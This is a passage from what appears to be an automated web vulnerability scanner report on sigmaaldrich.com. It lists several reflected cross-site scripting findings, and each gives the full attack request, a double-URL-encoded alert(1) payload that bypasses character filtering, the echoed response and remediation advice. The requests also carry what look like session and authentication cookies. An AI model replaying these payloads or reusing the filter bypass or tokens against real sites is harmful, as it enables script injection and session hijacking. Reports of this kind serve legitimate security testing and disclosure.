Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/f392b";alert(1)//68a7435bb01","E404") ;
   </script>
...[SNIP]...

1.29. http://www.sigmaaldrich.com/analytical-chromatography/syringes.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/syringes.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d61b%2522%253balert%25281%2529%252f%252f12b04b3a913 was submitted in the REST URL parameter 1. This input was echoed as 9d61b";alert(1)//12b04b3a913 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography9d61b%2522%253balert%25281%2529%252f%252f12b04b3a913/syringes.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28943
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography9d61b";alert(1)//12b04b3a913/syringes.html","E404") ;
   </script>
...[SNIP]...

1.30. http://www.sigmaaldrich.com/analytical-chromatography/syringes.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/syringes.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c05f%2522%253balert%25281%2529%252f%252ff52d09fd619 was submitted in the REST URL parameter 2. This input was echoed as 1c05f";alert(1)//f52d09fd619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/1c05f%2522%253balert%25281%2529%252f%252ff52d09fd619 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/1c05f";alert(1)//f52d09fd619","E404") ;
   </script>
...[SNIP]...

1.31. http://www.sigmaaldrich.com/analytical-chromatography/titration.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/titration.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1897%2522%253balert%25281%2529%252f%252fe256ad12c20 was submitted in the REST URL parameter 1. This input was echoed as f1897";alert(1)//e256ad12c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyf1897%2522%253balert%25281%2529%252f%252fe256ad12c20/titration.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28944
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyf1897";alert(1)//e256ad12c20/titration.html","E404") ;
   </script>
...[SNIP]...

1.32. http://www.sigmaaldrich.com/analytical-chromatography/titration.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/titration.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d0c%2522%253balert%25281%2529%252f%252f75f1e0d8bd7 was submitted in the REST URL parameter 2. This input was echoed as 71d0c";alert(1)//75f1e0d8bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/71d0c%2522%253balert%25281%2529%252f%252f75f1e0d8bd7 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/71d0c";alert(1)//75f1e0d8bd7","E404") ;
   </script>
...[SNIP]...

1.33. http://www.sigmaaldrich.com/analytical-chromatography/vials.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/vials.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a414%2522%253balert%25281%2529%252f%252fe5c2d52ef49 was submitted in the REST URL parameter 1. This input was echoed as 8a414";alert(1)//e5c2d52ef49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography8a414%2522%253balert%25281%2529%252f%252fe5c2d52ef49/vials.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 